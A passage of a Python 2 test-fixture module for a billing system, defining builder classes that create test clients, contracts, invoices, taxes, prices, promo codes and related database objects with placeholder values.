).scalar()\n if not id_exists:\n return id\n else:\n raise Exception('Failed {} attempts to generate unique id.'\n .format(max_attempts))\n\n # Main method to redefine in subclasses.\n def prepare(self, **params):\n \"\"\"Set all required attributes and get the object ready for building\"\"\"\n for key, val in params.iteritems():\n self._build_params[key] = val\n\n def postprocess(self):\n \"\"\"\n update an object after building\n \"\"\"\n pass\n\n def build(self, session):\n \"\"\"Build the object with all parameters and store it internally\"\"\"\n\n # Avoid building more than once\n if self._build_has_been_started:\n return self\n self._build_has_been_started = True\n\n # Generate unique id if needed\n if self._generate_id:\n self._build_params.id = self.generate_unique_id(session, 'id')\n\n # Build all the parameters\n for key, val in self._build_params.iteritems():\n if isinstance(val, ObjectBuilder):\n val.build(session)\n\n # Build the object\n if self._factory_class:\n self._obj = self._factory_class.create(**self._build_params.get_objects())\n else:\n self._obj = self._class(**self._build_params.get_objects())\n if isinstance(self._obj, (mapper.DomainObject, mapper.DeclarativeBase)):\n session.add(self._obj)\n session.flush()\n self.postprocess()\n for key, val in self._other.iteritems():\n if isinstance(val, ObjectBuilder) and not val._obj:\n val.build(session)\n return self\n\n @classmethod\n def construct(cls, session, **params):\n return cls(**params).build(session).obj\n\n def reset(self):\n \"\"\"Reset this builder and all children to state before build\"\"\"\n self._obj = None\n self._build_has_been_started = False\n for val in 
self._build_params.itervalues():\n if isinstance(val, ObjectBuilder) and val._build_has_been_started:\n val.reset()\n for val in self._other.itervalues():\n if isinstance(val, ObjectBuilder) and val._build_has_been_started:\n val.reset()\n\n\nclass ListBuilder(ObjectBuilder):\n \"\"\"Replacement of python sequences for builders\"\"\"\n\n def __getitem__(self, index):\n return self.b[index]\n\n def __init__(self, *args):\n super(ListBuilder, self).__init__()\n self._build_params = []\n for elem in args:\n if isinstance(elem, (tuple, list)):\n self._build_params.append(ListBuilder(*elem))\n else:\n self._build_params.append(elem)\n\n def get_obj(self):\n return [(v.obj if isinstance(v, ObjectBuilder) else v)\n for v in self.b]\n\n def build(self, session):\n # Avoid building more than once\n if self._build_has_been_started:\n return self\n self._build_has_been_started = True\n for item in self._build_params:\n if isinstance(item, ObjectBuilder):\n item.build(session)\n return self\n\n def reset(self):\n self._obj = None\n self._build_has_been_started = False\n for val in self._build_params:\n if isinstance(val, ObjectBuilder):\n val.reset()\n\n\nclass Getter(ObjectBuilder):\n \"\"\"\n Class to get things from database by id\n \"\"\"\n\n def __init__(self, _class, _id, **params):\n self._class = _class\n self._id = _id\n super(Getter, self).__init__(**params)\n\n def build(self, session):\n # Avoid building more than once\n if self._build_has_been_started:\n return self\n self._build_has_been_started = True\n self._obj = session.query(self._class).get(self._id)\n for key, val in self._build_params.iteritems():\n if isinstance(val, ObjectBuilder):\n val.build(session)\n for key, val in self._build_params.get_objects().iteritems():\n self._obj.__setattr__(key, val)\n return self\n\n\nclass GenericBuilder(ObjectBuilder):\n def __init__(self, _class, **params):\n self._class = _class\n if _class == mapper.ProdSeasonCoeff:\n self._generate_id = 1\n super(GenericBuilder, self).__init__(**params)\n\n\nclass ConfigBuilder(ObjectBuilder):\n _class = mapper.Config\n\n\nclass TaxBuilder(ObjectBuilder):\n _class = mapper.Tax\n _generate_id = True\n\n def prepare(self, **params):\n tax_policy = params.get(\"tax_policy\", None)\n if tax_policy:\n self.b.tax_policy = tax_policy\n self.b.tax_policy_id = tax_policy.id\n self._other.currency = Getter(mapper.Currency, 'RUR')\n else:\n currency = params.get(\"currency\", None)\n\n if isinstance(currency, mapper.Currency):\n cname = currency.char_code\n elif isinstance(currency, Getter):\n cname = currency._id\n else:\n cname = currency\n if cname:\n assert isinstance(cname, basestring)\n self._other.currency = Getter(mapper.Currency, cname)\n self.b.nds_pct = 0\n self.b.nsp_pct = 0\n if cname == 'RUR':\n self.b.nds_pct = 20\n if cname == 'UAH':\n self.b.nds_pct = 20\n self.b.nsp_pct = 0 # D('0.5')\n\n self.b.hidden = 0\n params.setdefault('dt', datetime.datetime(2001, 1, 1))\n\n super(TaxBuilder, self).prepare(**params)\n\n def build(self, session):\n currency = self._other.currency.build(session).obj\n self.b.iso_currency = currency.iso_code if not self.b.get('iso_currency') else self.b.iso_currency\n self.b.currency = currency\n super(TaxBuilder, self).build(session)\n return self\n\n\nclass TaxesBuilder(ObjectBuilder):\n _class = mapper.Tax\n _generate_id = True\n\n def build(self, session):\n tax_policies = session.query(mapper.TaxPolicy).filter_by(default_tax=1, hidden=0).all()\n for tax_policy in tax_policies:\n tax = TaxBuilder(tax_policy=tax_policy, 
product=self.b.product)\n tax.build(session)\n\n\nclass ThirpartyServiceBuilder(ObjectBuilder):\n _class = mapper.ThirdPartyService\n\n def prepare(self, **params):\n self.b.id = params['id']\n self.b.agent_scheme = params.pop('agent_scheme', 0)\n\n\nclass ServiceBuilder(ObjectBuilder):\n _class = mapper.Service\n\n def prepare(self, **params):\n self.b.dt = datetime.datetime.now()\n self.b.fiscal_service = mapper.FiscalService()\n self.b.balance_service = mapper.BalanceService()\n\n self.b.balance_service.contract_needed_agency = params.pop('contract_needed_agency', 0)\n self.b.balance_service.client_only = params.pop('client_only', None)\n self.b.balance_service.unilateral = params.pop('unilateral', None)\n self.b.balance_service.extra_pay = 0\n self.b.balance_service.in_contract = 1\n self.b.balance_service.intern = 0\n self.b.balance_service.is_auto_completion = 0\n self.b.balance_service.media = 1\n self.b.balance_service.contract_needed_client = params.pop('contract_needed_client', 1)\n self.b.balance_service.is_spendable = params.pop('is_spendable', 0)\n self.b.balance_service.url_orders = params.pop('url_orders', None)\n self.b.balance_service.show_to_user = params.pop('show_to_user', 2)\n self.b.balance_service.show_to_external_user = 1\n self.b.balance_service.send_invoices = 1\n self.b.balance_service.partner_income = params.pop('partner_income', 0)\n self._other.allowed_agency_without_contract = params.pop('allowed_agency_without_contract', 0)\n super(ServiceBuilder, self).prepare(**params)\n\n def build(self, session):\n self.b.allowed_agency_without_contract = self._other.allowed_agency_without_contract\n if 'id' not in self.b:\n self.b.id = self.generate_unique_id(session, 'id')\n return super(ServiceBuilder, self).build(session)\n\n\nclass ThirdpartyServiceBuilder(ObjectBuilder):\n _class = mapper.ThirdPartyService\n\n def prepare(self, **params):\n self.b.enabled = params.get('enabled', 1)\n super(ThirdpartyServiceBuilder, self).prepare(**params)\n\n\nclass ClientBuilder(ObjectBuilder):\n _class = mapper.Client\n\n def __init__(self, with_single_account=False, **params):\n super(ClientBuilder, self).__init__(**params)\n self._with_single_account = with_single_account\n\n def prepare(self, **params):\n self.b.name = 'test'\n self.b.email = \"test@test.ru\"\n super(ClientBuilder, self).prepare(**params)\n\n def build(self, session):\n if self._with_single_account:\n self.b.creation_dt = self.b.get('creation_dt', session.config.SINGLE_ACCOUNT_MIN_CLIENT_DT)\n\n result = super(ClientBuilder, self).build(session)\n\n if self._with_single_account:\n from balance.actions.single_account.prepare import process_client\n process_client(self.obj)\n\n return result\n\n\nclass CorrectionTemplateGroupBuilder(ObjectBuilder):\n _class = mapper.CorrectionTemplateGroup\n\n def prepare(self, **params):\n self.b.id = generate_int(4)\n self.b.title = generate_character_string(16)\n self.b.items = params.get('items') or []\n super(CorrectionTemplateGroupBuilder, self).prepare(**params)\n\n\nclass GroupBuilder(ObjectBuilder):\n _class = mapper.Group\n\n\nclass EmailMessageBuilder(ObjectBuilder):\n _class = mapper.EmailMessage\n\n def build(self, session):\n return super(EmailMessageBuilder, self).build(session)\n\n def prepare(self, **params):\n self.b.opcode = GENERIC_MESSAGE_CREATOR_MESSAGE_OPCODE\n self.b.object_id = get_big_number()\n self.b.recepient_name = 'recepient_name'\n self.b.recepient_address = 'test@email.ru'\n if 'data' in params:\n self.b.data = params['data']\n 
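        # Editorial note (hedged): prepare() above seeds test-friendly defaults --
        # a generic-message opcode, a random object_id and a placeholder
        # recipient -- so an EmailMessage can be built with no arguments; any
        # keyword passed in params (such as 'data') is written into the build
        # parameters by the base ObjectBuilder.prepare() call below and takes
        # precedence over those defaults.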
super(EmailMessageBuilder, self).prepare(**params)\n\n\nclass PassportBuilder(ObjectBuilder):\n _class = mapper.Passport\n\n def prepare(self, **params):\n self.b.gecos = \"Pupkin pup\"\n self.b.email = \"test@test.ru\"\n self.b.avatar = \"0/0-0\"\n self.b.client = params.get('client')\n self.b.simple_client = params.get('simple_client')\n super(PassportBuilder, self).prepare(**params)\n\n def build(self, session):\n if not hasattr(self.b, 'passport_id'):\n self.b.passport_id = self.generate_unique_id(session, 'passport_id')\n if not hasattr(self.b, 'login'):\n self.b.login = \"testlogin\" + str(self.b.passport_id)\n return super(PassportBuilder, self).build(session)\n\n\nCURRENCY_TO_TAX_POLICY_ID_MAP = {\n 'USD': 21,\n 'RUR': 281,\n 'EUR': 8,\n 'UAH': 5,\n 'TRY': 22,\n 'CHF': 8\n}\n\n\nclass SimplePriceBuilder(ObjectBuilder):\n _class = mapper.Price\n _generate_id = True\n\n def prepare(self, **params):\n self._other.currency = Getter(mapper.Currency, params.pop('currency_code'))\n self.b.price = 100\n super(SimplePriceBuilder, self).prepare(**params)\n\n def build(self, session):\n currency = self._other.currency.build(session).obj\n self.b.iso_currency = currency.iso_code\n self.b.currency = currency\n super(SimplePriceBuilder, self).build(session)\n\n return self\n\n\nclass PlaceBuilder(ObjectBuilder):\n _class = mapper.Place\n _generate_id = True\n\n def prepare(self, **params):\n self.b.type = 2\n self.b.internal_type = 0\n self.b.url='url_{}'.format(generate_character_string(3))\n super(self.__class__, self).prepare(**params)\n\n\nclass MkbCategoryBuilder(ObjectBuilder):\n _class = mapper.MkbCategory\n _generate_id = True\n\n def prepare(self, **params):\n self.b.name = generate_character_string(10)\n self.b.price = RANDOM.randint(10, 1000)\n self.b.unit_id = 799\n self.b.nds = 1\n super(self.__class__, self).prepare(**params)\n\n\nclass PriceBuilder(ObjectBuilder):\n \"\"\"Test price builder\"\"\"\n _class = mapper.Price\n _generate_id = True\n\n def prepare(self, **params):\n self.b.dt = datetime.datetime(2001, 1, 1)\n self.b.tax = 1\n currency_code = params.pop('currency', 'RUR')\n currency = Getter(mapper.Currency, currency_code) if isinstance(currency_code, basestring) else currency_code\n self._other.currency = currency\n self.b.price = params.pop('price', None) or 100\n self.b.product = None\n\n super(PriceBuilder, self).prepare(**params)\n\n def build(self, session):\n currency = self._other.currency.build(session).obj\n self.b.iso_currency = currency.iso_code if not self.b.get('iso_currency') else self.b.iso_currency\n self.b.currency = currency\n super(PriceBuilder, self).build(session)\n if self.obj.tax:\n tax_policy_pct_id = CURRENCY_TO_TAX_POLICY_ID_MAP.get(self.b.currency.char_code, 1)\n self.obj.tax_policy_pct = session.query(mapper.TaxPolicyPct).getone(tax_policy_pct_id)\n\n return self\n\n\nclass ContractBuilder(ObjectBuilder):\n _class = mapper.Contract\n\n def prepare(self, **params):\n from billing.contract_iface import contract_meta\n\n ctype = params.pop('ctype', 'GENERAL')\n contract_params = dict(\n client=params.pop('client', ClientBuilder()),\n external_id=params.pop('external_id', 'test/test'),\n is_process_taxi_netting_in_oebs_=params.pop('is_process_taxi_netting_in_oebs_', None),\n cpf_netting_last_dt=params.pop('cpf_netting_last_dt', None),\n ctype=contract_meta.ContractTypes(type=ctype),\n )\n person = params.pop('person', PersonBuilder(client=contract_params['client']))\n if person:\n contract_params['person'] = person\n\n super(self.__class__, 
self).prepare(**contract_params)\n\n if params.get('dt', None) is None:\n # if dt is not present or explicitly None we use default\n params['dt'] = datetime.datetime.now() - datetime.timedelta(10)\n params.setdefault('finish_dt', datetime.datetime.now() + datetime.timedelta(10))\n if ctype == 'GENERAL':\n params.setdefault('commission', ContractTypeId.NON_AGENCY)\n params.setdefault('payment_type', POSTPAY_PAYMENT_TYPE)\n params.setdefault('is_signed', datetime.datetime.now())\n\n self._collateral_params = params\n\n def build(self, session):\n import importlib\n\n try:\n contract_attributes = importlib.import_module(\n 'billing.contract_iface.cmeta.%s' % self.obj.type.lower()).contract_attributes\n except (ImportError, AttributeError):\n contract_attributes = None\n\n super(ContractBuilder, self).build(session)\n\n if self._collateral_params.get('manager_code') is None:\n manager = SingleManagerBuilder.construct(session, login='login_{}'.format(generate_int(4)))\n self._collateral_params['manager_code'] = manager.manager_code\n\n if self._collateral_params.get('services') is None:\n service = ServiceBuilder.construct(session)\n self._collateral_params['services'] = service.id\n\n collateral_column_names = [c.name for c in list(mapper.ContractCollateral.__table__.columns)]\n\n for attribute, value in self._collateral_params.iteritems():\n if isinstance(value, ObjectBuilder):\n value = value.build(session).obj\n if attribute.lower() == 'collaterals':\n for col in value:\n dt = col.pop('dt', None) or ut.trunc_date(datetime.datetime.now())\n collateral_type_id = col.pop('collateral_type_id', None)\n col_type = contract_meta.collateral_types[self.obj.ctype.type][collateral_type_id]\n self.obj.append_collateral(dt, col_type, **col)\n continue\n attr_meta = contract_attributes.get(attribute.upper(), None) if contract_attributes else None\n if attribute in collateral_column_names or attr_meta is None:\n setattr(self.obj.col0, attribute, value)\n else:\n attr_meta.todb(self.obj.col0, attribute.upper(), value)\n\n session.flush()\n return self\n\n\nclass CollateralBuilder(ObjectBuilder):\n _class = mapper.ContractCollateral\n\n def prepare(self, **params):\n # each collateral must have a dt\n self.b.dt = params.pop('dt', None) or datetime.datetime.now()\n super(CollateralBuilder, self).prepare(**params)\n\n\nclass ContractPDFEmailBuilder(ObjectBuilder):\n _class = mapper.ContractPDFEmail\n\n\nclass CRPaymentReportBuilder(ObjectBuilder):\n _class = mapper.CRPaymentReport\n\n def prepare(self, **params):\n self.b.contract = params.pop('contract', ContractBuilder())\n self.b.start_dt = params.pop('start_dt', datetime.datetime.now())\n self.b.end_dt = params.pop('end_dt', datetime.datetime.now() + datetime.timedelta(days=7))\n self.b.nach_amount = params.pop('nach_amount', D('1.23'))\n self.b.perech_amount = params.pop('perech_amount', D('6.66'))\n self.b.avans_amount = params.pop('avans_amount', D('9.99'))\n super(CRPaymentReportBuilder, self).prepare(**params)\n\n\nclass YandexMoneyPaymentBuilder(ObjectBuilder):\n \"\"\"Test payment builder\"\"\"\n _class = mapper.YandexMoneyPayment\n\n\nclass WebMoneyPaymentBuilder(ObjectBuilder):\n _class = mapper.WebMoneyPaymasterPayment\n\n\nclass CardPaymentBuilder(ObjectBuilder):\n _class = mapper.CardPayment\n\n def prepare(self, **params):\n invoice = params.get('invoice', None)\n if not invoice:\n params['invoice'] = InvoiceBuilder()\n\n super(CardPaymentBuilder, self).prepare(**params)\n\n\nclass TrustApiPaymentBuilder(ObjectBuilder):\n _class = 
mapper.TrustApiPayment\n\n\nclass CardRegister(ObjectBuilder):\n _class = mapper.CardRegister\n\n\nclass RBSRegisterBuilder(ObjectBuilder):\n _class = mapper.RBSRegister\n\n def prepare(self, **params):\n self.b.register_dt = datetime.datetime.now()\n self.b.amount = D('1')\n super(RBSRegisterBuilder, self).prepare(**params)\n\n\nclass ActivityBuilder(ObjectBuilder):\n _class = mapper.ActivityType\n _generate_id = True\n\n def prepare(self, **params):\n self.b.hidden = 0\n self.b.name = 'Test activity'\n super(ActivityBuilder, self).prepare(**params)\n\n\nclass ProductGroupBuilder(ObjectBuilder):\n \"\"\"Test ProductGroup builder\"\"\"\n _class = mapper.ProductGroup\n _generate_id = True\n\n def prepare(self, **params):\n self.b.discount_id = 0\n super(ProductGroupBuilder, self).prepare(**params)\n\n\nclass ProductBuilder(ObjectBuilder):\n _class = mapper.Product\n _generate_id = True\n\n def prepare(self, **params):\n params.setdefault('name', 'Test Product')\n params.setdefault('product_group', ProductGroupBuilder(\n name='Test Product Group',\n hidden=0,\n discount_id=0\n ))\n\n # 'auction' product unit; required when quantity is not integer\n self.b.unit = params.pop('unit', Getter(mapper.ProductUnit, 0))\n self.b.mdh_id = str(uuid.uuid4())\n if 'taxes' in params:\n taxes = _mk_list(params.pop('taxes'))\n\n def _cr_tax(tax_param):\n tax_param = _mk_list(tax_param)\n if len(tax_param) == 1:\n policy, = tax_param\n dt = datetime.datetime(2000, 1, 1)\n else:\n dt, policy = tax_param\n\n return TaxBuilder(product=self, dt=dt, tax_policy=policy)\n\n self._other.tax = ListBuilder(*map(_cr_tax, taxes))\n elif params.pop('create_taxes', True):\n # This tax keeps RequestOrder.update happy\n self._other.tax = TaxesBuilder(product=self)\n\n if 'prices' in params:\n prices = _mk_list(params.pop('prices'))\n\n def _cr_price(price_param):\n price_param = _mk_list(price_param)\n if len(price_param) == 2:\n currency, price = price_param\n dt = datetime.datetime(2000, 1, 1)\n tax_pct = None\n elif len(price_param) == 3:\n dt, currency, price = price_param\n tax_pct = None\n else:\n dt, currency, price, tax_pct = price_param\n\n return PriceBuilder(\n product=self, currency=currency, dt=dt,\n price=price, tax_policy_pct=tax_pct, tax=None\n )\n\n self._other.price = ListBuilder(*map(_cr_price, prices))\n elif params.pop('create_price', True):\n currency = Getter(mapper.Currency, params.get('currency', 'RUR'))\n self._other.price = PriceBuilder(\n product=self,\n currency=currency,\n price=params.pop('price', None)\n )\n self.b.activity_type = ActivityBuilder()\n\n super(ProductBuilder, self).prepare(**params)\n\n\nclass ProductUnitBuilder(ObjectBuilder):\n _class = mapper.ProductUnit\n\n def prepare(self, **params):\n self.b.id = get_big_number()\n self.b.name = 'Test product unit'\n self.b.englishname = 'Test product unit en'\n self.b.type_rate = 10\n self.b.product_type = ProductTypeBuilder()\n self.b.precision = 4\n super(ProductUnitBuilder, self).prepare(**params)\n\n\nclass ProductTypeBuilder(ObjectBuilder):\n _class = mapper.ProductType\n\n def prepare(self, **params):\n self.b.id = get_big_number()\n self.b.cc = generate_character_string()\n self.b.name = generate_character_string()\n\n\nclass PartnerProductBuilder(ObjectBuilder):\n _class = mapper.PartnerProduct\n\n def prepare(self, **params):\n if 'product' in params:\n product = params.pop('product')\n else:\n raise exc.INVALID_PARAM('product')\n\n self.b.service_id = product.engine_id\n self.b.product_id = product.id\n 
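# The partner link is stored as plain ids, so the passed product is\n # assumed to already expose engine_id and id.\n 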
super(PartnerProductBuilder, self).prepare(**params)\n\n\nclass MarkupBuilder(ObjectBuilder):\n _class = mapper.Markup\n\n _generate_id = True\n\n def prepare(self, **params):\n self.b.code = \"Test Markup\"\n super(MarkupBuilder, self).prepare(**params)\n\n\nclass ProductMarkupBuilder(ObjectBuilder):\n _class = mapper.ProductMarkup\n\n _generate_id = True\n\n def prepare(self, **params):\n self.b.pct = 0\n super(ProductMarkupBuilder, self).prepare(**params)\n\n\nclass SingleManagerBuilder(ObjectBuilder):\n _class = mapper.Manager\n\n def prepare(self, **params):\n params.setdefault('hidden', 0)\n params.setdefault('is_sales', 0)\n params.setdefault('is_backoffice', 0)\n params.setdefault('manager_type', 0)\n params.setdefault('firm_id', FirmId.YANDEX_OOO)\n super(SingleManagerBuilder, self).prepare(**params)\n\n def build(self, session):\n self.b.manager_code = self.generate_unique_id(session, attrib_name='manager_code')\n return super(SingleManagerBuilder, self).build(session)\n\n\nclass ManagerWithChiefsBuilder(ObjectBuilder):\n _class = mapper.Manager\n\n def _get_manager(self, session, number):\n managers = (\n session.query(mapper.Manager)\n )\n managers_with_chiefs = []\n for m in managers:\n try:\n m.chief\n except exc.NOT_FOUND:\n pass\n else:\n managers_with_chiefs.append(m)\n # m.chief spawns too many queries,\n # and five managers should be enough.\n if len(managers_with_chiefs) == 5:\n break\n\n return managers_with_chiefs[number]\n\n def prepare(self, **params):\n bp = self.b\n if 'number' not in params:\n bp.number = 0\n super(ManagerWithChiefsBuilder, self).prepare(**params)\n\n def build(self, session):\n \"\"\"\n Trying to fetch manager with chief because of test_contract_notifier.py.\n \"\"\"\n m = self._get_manager(session, self.b.number)\n self._obj = m\n return self\n\n\nclass OrderBuilder(ObjectBuilder):\n \"\"\"Test order builder\"\"\"\n _class = mapper.Order\n\n def prepare(self, **params):\n params.setdefault('client', ClientBuilder())\n params.setdefault('manager', SingleManagerBuilder())\n product_id = params.pop('product_id', None)\n if product_id:\n params.setdefault('product', Getter(mapper.Product, product_id))\n else:\n params.setdefault('product', ProductBuilder())\n params.setdefault('service', Getter(mapper.Service, params.get('service_id', ServiceId.DIRECT)))\n super(OrderBuilder, self).prepare(**params)\n\n def build(self, session):\n self.b.service_order_id = self.generate_unique_id(session,\n 'service_order_id')\n self.b.service_order_id_str = str(uuid.uuid4())\n return super(OrderBuilder, self).build(session)\n\n\nclass BasketItemBuilder(ObjectBuilder):\n \"\"\"Test basket item builder\"\"\"\n _class = mapper.BasketItem\n\n\nclass BasketRegisterRowBuilder(ObjectBuilder):\n _class = mapper.BasketRegisterRow\n\n def prepare(self, **params):\n self.b.ref_invoice = params.pop('ref_invoice')\n self.b.amount = self.b.ref_invoice.amount\n self.b.amount_nds = self.b.ref_invoice.amount_nds\n self.b.amount_nsp = self.b.ref_invoice.amount_nsp\n super(BasketRegisterRowBuilder, self).prepare(**params)\n\n\nclass BasketBuilder(ObjectBuilder):\n \"\"\"Test basket builder\"\"\"\n _class = mapper.Basket\n\n def prepare(self, **params):\n if 'rows' not in params:\n params.setdefault('client', ClientBuilder())\n product = ProductBuilder()\n params['rows'] = [\n BasketItemBuilder(quantity=2, order=OrderBuilder(client=params['client'], product=product),\n desired_discount_pct=0, user_data='1')\n ]\n\n super(BasketBuilder, 
self).prepare(**params)\n\n\nclass RequestBuilder(ObjectBuilder):\n \"\"\"Test request builder\"\"\"\n _class = mapper.Request\n\n def prepare(self, **params):\n if 'basket' in params:\n self.b.basket = params['basket']\n else:\n self.b.basket = BasketBuilder()\n\n if 'rows' in params:\n raise ut.INVALID_PARAM(\"\"\"Request \"rows\" parameter is obsolete.\"\"\")\n if 'client' in params:\n raise ut.INVALID_PARAM(\"\"\"Request \"client\" parameter is obsolete.\"\"\")\n super(RequestBuilder, self).prepare(**params)\n # If 'rows' was in params, client will be set correctly, too\n if 'client' not in self.b.basket.b:\n try:\n self.b.basket.b.client = self.b.basket.b.rows[0].order.client\n except IndexError:\n # If there is no rows, you probably know what you are doing.\n pass\n\n\nclass PersonBuilder(ObjectBuilder):\n \"\"\"Test person builder\"\"\"\n _class = mapper.Person\n _person_params = {}\n\n def prepare(self, **params):\n self._person_params = params\n super(PersonBuilder, self).prepare(**params)\n\n def build(self, session):\n from billing.contract_iface.cmeta import person\n\n params = self._person_params\n self.b.operator_uid = session.oper_id\n self.b.type = params.get('type', 'ph')\n\n if not {'client', 'client_id'} & set(params.keys()):\n self.b.client = ClientBuilder()\n elif 'client_id' in params:\n self.b.client = Getter(mapper.Client, params.pop('client_id'))\n\n super(PersonBuilder, self).build(session)\n\n attributes = person.attribute_batch\n\n for attr, value in self._person_params.items():\n if isinstance(value, ObjectBuilder):\n value = value.build(session).obj\n attr_meta = attributes.get(attr.upper(), None) if attributes else None\n\n if attr_meta is not None:\n attr_meta.todb(self.obj, attr.upper(), value)\n else:\n setattr(self.obj, attr, value)\n\n return self\n\n\nclass EdoOfferBuilder(ObjectBuilder):\n _class = mapper.EdoOffer\n\n def prepare(self, **params):\n params.setdefault('firm_id', FirmId.YANDEX_OOO)\n params.setdefault('active_start_date', datetime.datetime.now())\n params.setdefault('active_end_date', None)\n params.setdefault('status', 'FRIENDS')\n params.setdefault('blocked', False)\n params.setdefault('default_flag', True)\n params.setdefault('enabled_flag', True)\n params.setdefault('org_orarowid', str(generate_int(25)))\n params.setdefault('inv_orarowid', str(generate_int(25)))\n super(EdoOfferBuilder, self).prepare(**params)\n\n\nclass InvoiceBuilder(ObjectBuilder):\n _class = mapper.Invoice\n _factory_class = InvoiceFactory\n\n def prepare(self, **params):\n client_params = dict()\n if 'client' in params:\n client_params['client'] = params['client']\n elif 'client_id' in params:\n client_params['client_id'] = params['client_id']\n\n params.setdefault('request', RequestBuilder(basket=BasketBuilder(**client_params)))\n params.setdefault('paysys', Getter(mapper.Paysys, params.get('paysys_id', PAYSYS_ID)))\n params.setdefault('status_id', 0)\n params.setdefault('credit', 0)\n params.setdefault('temporary', False)\n super(InvoiceBuilder, self).prepare(**params)\n\n def build(self, session):\n if self.b.get('person') is None:\n if isinstance(self.b.paysys, mapper.Paysys):\n paysys = self.b.paysys\n else:\n paysys = self.b.paysys.build(session).obj\n\n if isinstance(self.b.request, mapper.Request):\n client = self.b.request.client\n else:\n client = self.b.request.b.basket.b.client\n\n self.b.person = PersonBuilder(client=client, type=paysys.category,\n person_category=paysys.person_category)\n return super(InvoiceBuilder, self).build(session)\n\n\nclass 
OebsCashPaymentFactBuilder(ObjectBuilder):\n _class = mapper.OebsCashPaymentFact\n _generate_id = True\n\n def prepare(self, **params):\n bp = self.b\n\n bp.amount = params['amount']\n bp.operation_type = params.get('operation_type', OebsOperationType.INSERT)\n invoice = params.get('invoice')\n bp.receipt_number = invoice and invoice.external_id or params['receipt_number']\n\n bp.created_by = bp.last_updated_by = -1\n dt = params.pop('dt') if 'dt' in params else None\n dt = dt or datetime.datetime.now()\n bp.creation_date = bp.last_update_date = bp.receipt_date = dt\n\n super(OebsCashPaymentFactBuilder, self).prepare(**params)\n\n\nclass PayOnCreditCase(object):\n def __init__(self, session):\n self.session = session\n\n def pay_on_credit(self, b_basket, contract, paysys=None, with_paystep=False):\n if not isinstance(b_basket, BasketBuilder):\n raise ut.INVALID_PARAM('BasketBuilder expected')\n\n b_request = RequestBuilder(basket=b_basket)\n req = b_request.build(self.session).obj\n\n coreobj = core.Core(self.session)\n if with_paystep:\n invoices = coreobj.create_invoice(\n request_id=req.id,\n paysys_id=paysys.id if paysys else 1000,\n person_id=contract.person.id,\n contract_id=contract.id,\n credit=1)\n else:\n invoices = coreobj.pay_on_credit(\n request_id=req.id,\n paysys_id=paysys.id if paysys else 1000,\n person_id=contract.person.id,\n contract_id=contract.id)\n\n self.session.flush()\n return invoices\n\n def get_contract(self, **params):\n b_client = ClientBuilder()\n b_person = PersonBuilder(client=b_client, type='ph').build(self.session)\n\n if 'firm' not in params:\n params['firm'] = 1\n if 'currency' not in params:\n params['currency'] = self.session.query(mapper.Currency).getone(\n char_code=self.session.query(mapper.Firm).getone(params['firm']).default_currency).num_code\n\n params['is_signed'] = datetime.datetime.now() if params.get('is_signed') else None\n _params = {'client': b_client, 'person': b_person}\n _params.update(params)\n b_contract = ContractBuilder(\n **_params\n )\n cont = b_contract.build(self.session).obj\n\n cont.col0.is_signed = datetime.datetime.now()\n\n for p, v in params.iteritems():\n if p in ['person_id', 'client_id']:\n setattr(cont, p, v)\n else:\n setattr(cont.col0, p, v)\n self.session.flush()\n\n return cont\n\n def get_product_hierarchy(self, **params):\n '''activity type hierarchy tree:\n p[0]\n | \\\n p[1] p[2]\n |\n p[3]\n '''\n p = [ProductBuilder(**params) for x in xrange(4)]\n for x in [(3, 1), (1, 0), (2, 0)]:\n p[x[0]].b.activity_type.b.parent = p[x[1]].b.activity_type\n\n # Pre-build activity_types to generate their IDs.\n [product.b.activity_type.build(self.session) for product in p]\n\n return p\n\n def get_credits_available(self, b_basket, cont):\n if not isinstance(b_basket, BasketBuilder):\n raise ut.INVALID_PARAM('BasketBuilder expected')\n\n b_request = RequestBuilder(basket=b_basket)\n b_invoice = InvoiceBuilder(request=b_request, person=cont.person, contract=cont)\n inv = b_invoice.build(self.session).obj\n\n return inv.get_credit_available()\n\n\nclass JobDescrBuilder(ObjectBuilder):\n _class = JobDescr\n\n def prepare(self, **params):\n self.b.name = \"name\"\n self.b.command = \"command\"\n super(JobDescrBuilder, self).prepare(**params)\n\n\nclass JobScheduleBuilder(ObjectBuilder):\n _class = JobSchedule\n\n def prepare(self, **params):\n self.b.name = \"name\"\n self.b.crontab = \"* * * * *\"\n super(JobScheduleBuilder, self).prepare(**params)\n\n\nclass PromoCodeBuilder(ObjectBuilder):\n _class = 
mapper.PromoCode\n\n\nclass PromoCodeGroupBuilder(ObjectBuilder):\n _class = None\n\n def prepare(self, **params):\n calc_class_name = params.pop('calc_class_name', 'FixedDiscountPromoCodeGroup')\n self._class = getattr(mapper, calc_class_name)\n self.b.calc_class_name = calc_class_name\n self.b.service_ids = params.get('service_ids', [7])\n self.b._product_ids = params.pop('product_ids', None)\n\n promocode_info_list = params.pop(\n 'promocode_info_list',\n [{'code': str(generate_numeric_string(16)), 'client_id': None}]\n )\n self.b.promocodes = [\n PromoCodeBuilder(code=promocode_info['code'], client_id=promocode_info['client_id'])\n for promocode_info in promocode_info_list\n ]\n\n event = params.get('event', None)\n if 'event_name' in params:\n event = mapper.PromoCodeEvent(event=params['event_name'])\n self.b.event = event\n\n self.b.start_dt = datetime.datetime.now() - datetime.timedelta(days=1)\n self.b.end_dt = datetime.datetime.now() + datetime.timedelta(days=7)\n self.b.firm_id = FirmId.YANDEX_OOO\n\n calc_params = params.pop('calc_params', {u\"discount_pct\": u\"66\"})\n if 'apply_on_create' not in calc_params:\n calc_params['apply_on_create'] = params.pop('apply_on_create', False)\n self.b.calc_params = calc_params\n\n super(PromoCodeGroupBuilder, self).prepare(**params)\n\n\nclass BankBuilder(ObjectBuilder):\n _class = mapper.Bank\n _generate_id = True\n\n def prepare(self, **params):\n self.b.name = 'Test Bank'\n self.b.bik = '012345678'\n self.b.city = u'Москва'\n self.b.hidden = 0\n super(BankBuilder, self).prepare(**params)\n\n\nclass BankIntBuilder(ObjectBuilder):\n _class = mapper.BankIntClass\n\n def prepare(self, **params):\n self.b.bictypeint = params.pop('bictypeint', 'SWIFT')\n self.b.bicint = params.pop('bicint', '0123456789A')\n self.b.name = 'Test Bank'\n self.b.rplstatus = 1\n self.b.client = 0\n self.b.update_dt = datetime.datetime.now()\n super(BankIntBuilder, self).prepare(**params)\n\n\nclass ExportBuilder(ObjectBuilder):\n _class = mapper.Export\n\n\nclass CountryBuilder(ObjectBuilder):\n _class = mapper.Country\n\n def prepare(self, **params):\n self.b.region_id = get_big_number()\n self.b.region_name = u'Новое Кукуево'\n self.b.region_name_en = u'New Kukuevo'\n super(CountryBuilder, 